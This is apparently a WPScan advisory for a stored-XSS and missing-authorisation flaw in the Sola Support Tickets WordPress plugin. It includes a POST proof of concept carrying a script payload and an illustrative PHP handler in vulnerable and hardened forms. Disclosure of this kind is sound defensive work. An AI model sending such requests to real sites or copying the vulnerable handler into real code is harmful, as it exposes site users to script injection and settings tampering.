Sola Support Ticket <= 3.12 - XSS & Configuration Change


Description
Any logged-in user, regardless of role, who can reach wp-admin in any way can update the plugin's settings, including enabling HTML parsing. Such a user can also change any notification message to include JavaScript, which can then be used to obtain information by forgery.
Proof of Concept
Make a POST request to /wp-admin with the following parameters:

sola_st_save_settings:1
sola_st_settings_allow_html:1
sola_st_settings_thank_you_text:<script>alert(1);</script>
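
The root cause the description points to is a settings handler that accepts the save request from any authenticated user and stores the submitted text unsanitised. The following is an added illustrative PHP example written for this entry; it is not the Sola Support Tickets code and does not show the actual 3.13 fix. Only the POST field names come from the proof of concept above; the function names, the nonce action `sola_example_settings` and the nonce field `_sola_example_nonce` are assumptions.

```php
<?php
// Illustrative WordPress settings-save handler for this advisory.
// NOT the plugin's own code; only the POST field names are taken from the PoC.

// Vulnerable pattern (hypothetical): any request to wp-admin carrying
// sola_st_save_settings is honoured, with no capability or nonce check and
// no sanitisation of the stored text.
function sola_example_save_settings_vulnerable() {
    if ( empty( $_POST['sola_st_save_settings'] ) ) {
        return;
    }
    update_option( 'sola_st_settings_allow_html', $_POST['sola_st_settings_allow_html'] );
    update_option( 'sola_st_settings_thank_you_text', $_POST['sola_st_settings_thank_you_text'] );
}

// Hardened pattern: capability check, CSRF nonce and sanitisation on save.
function sola_example_save_settings_hardened() {
    if ( empty( $_POST['sola_st_save_settings'] ) ) {
        return;
    }
    // Only users holding manage_options (administrators) may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'sola-example' ), '', array( 'response' => 403 ) );
    }
    // Reject forged requests; action and field names are assumed for this example.
    check_admin_referer( 'sola_example_settings', '_sola_example_nonce' );

    $allow_html = ! empty( $_POST['sola_st_settings_allow_html'] ) ? 1 : 0;
    update_option( 'sola_st_settings_allow_html', $allow_html );

    $raw = isset( $_POST['sola_st_settings_thank_you_text'] )
        ? wp_unslash( $_POST['sola_st_settings_thank_you_text'] ) : '';
    // When HTML is allowed, limit it to the post-safe whitelist, which drops
    // <script> tags and on* handlers; otherwise reduce to plain text.
    $clean = $allow_html ? wp_kses_post( $raw ) : sanitize_text_field( $raw );
    update_option( 'sola_st_settings_thank_you_text', $clean );
}

// Output side: escape according to the setting; never echo the option raw.
function sola_example_render_thank_you() {
    $text = get_option( 'sola_st_settings_thank_you_text', '' );
    if ( get_option( 'sola_st_settings_allow_html' ) ) {
        echo wp_kses_post( $text );
    } else {
        echo esc_html( $text );
    }
}

add_action( 'admin_init', 'sola_example_save_settings_hardened' );
```

With the hardened handler, the PoC request above is rejected for non-administrators by the capability check, rejected for everyone without a valid nonce, and the `<script>` payload is stripped before storage even when HTML is enabled.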

Affects

Plugin sola-support-tickets
fixed in version 3.13

References

URL https://wordpress.org/plugins/sola-support-tickets/changelog/
URL https://plugins.trac.wordpress.org/changeset?old_path=%2Fsola-support-tickets%2Ftags%2F3.12&old=1350554&new_path=%2Fsola-support-tickets%2Ftags%2F3.13&new=1350554&sfp_email=&sfph_mail=

Classification

Type BYPASS

Miscellaneous

Submitter Justin Greer
Submitter Website http://justin-greer.com
Submitter Twitter justingreer2014
Verified No
WPVDB ID 8389

Timeline

Publicly Published 2016-01-28
Added 2016-02-14
Last Updated 2016-02-14

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.